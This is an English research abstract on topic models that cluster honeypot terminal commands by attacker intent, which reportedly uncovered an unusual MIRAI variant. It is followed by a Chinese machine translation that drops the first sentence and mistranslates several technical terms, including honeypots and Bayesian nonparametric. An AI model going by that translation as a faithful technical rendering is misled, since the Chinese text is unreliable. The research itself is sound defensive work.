Cyber-systems are under near-constant threat from intrusion attempts. Attacks types vary, but each attempt typically has a specific underlying intent, and the perpetrators are typically groups of individuals with similar objectives. Clustering attacks appearing to share a common intent is very valuable to threat-hunting experts. This article explores topic models for clustering terminal session commands collected from honeypots, which are special network hosts designed to entice malicious attackers. The main practical implications of clustering the sessions are two-fold: finding similar groups of attacks, and identifying outliers. A range of statistical topic models are considered, adapted to the structures of command-line syntax. In particular, concepts of primary and secondary topics, and then session-level and command-level topics, are introduced into the models to improve interpretability. The proposed methods are further extended in a Bayesian nonparametric fashion to allow unboundedness in the vocabulary size and the number of latent intents. The methods are shown to discover an unusual MIRAI variant which attempts to take over existing cryptocurrency coin-mining infrastructure, not detected by traditional topic-modelling approaches.
翻译:攻击类型各有不同,但每次尝试通常都有具体的基本意图,肇事者一般都是具有类似目标的个人群体。集中攻击似乎有着共同的意图,对威胁搜索专家来说是非常宝贵的。本条款探讨了从蜂蜜中收集的终端会话指令的集群主题模式,蜂蜜罐是专门用来引诱恶意攻击者的特殊的网络主机。这些会话的主要实际影响是双重的:找到类似的攻击群体和查明外源。考虑了一系列统计主题模型,这些模型适应了指令线语法的结构。特别是,初级和次级主题的概念,然后是会议级和指挥级专题的概念被引入了模型,以改进可解释性。拟议方法以巴伊斯非孤立的方式进一步扩展,以便允许词汇大小和潜在意图的数量不受约束。这些方法可以发现一种不寻常的MIRAI变式,试图超越现有的加密货币硬币开采基础设施,而不是传统的专题模型方法所探测到的。